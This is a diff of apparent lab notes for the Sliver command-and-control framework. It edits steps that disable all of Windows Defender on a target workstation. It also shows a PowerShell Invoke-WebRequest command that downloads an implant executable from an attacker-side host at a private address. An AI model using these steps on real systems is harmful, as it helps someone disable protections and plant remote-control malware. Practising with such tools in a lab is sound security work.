jjkirn/sliver-c2/notes/part1.md

 We need to disable all of Windows Defender including the realtime part.

-You can follow this [video - PERMANENTLY TURN OFF Windows Defender on Windows 11](https://www.youtube.com/watch?v=81l__vvGnjA) to turn off all of "Windows Defender".
+You can follow the steps in a video from John Hammond - [PERMANENTLY TURN OFF Windows Defender on Windows 11](https://www.youtube.com/watch?v=81l__vvGnjA) to turn off all of "Windows Defender".

-Complete all the steps from the video and reboot the the Windows Target [ws01].
+Complete all the steps from the video and reboot the Windows Workstation target [ws01].

-You now should be able to download and run the implant from Kali:
+You now should be able to download and run the implant on WS01:
 ```
 PS C:> Invoke-WebRequest -Uri “http://192.168.175.130:8000/GREAT_EXAMINATION.exe” -OutFile "C:\Users\alice\Downloads\GREAT_EXAMINATION.exe"
 ```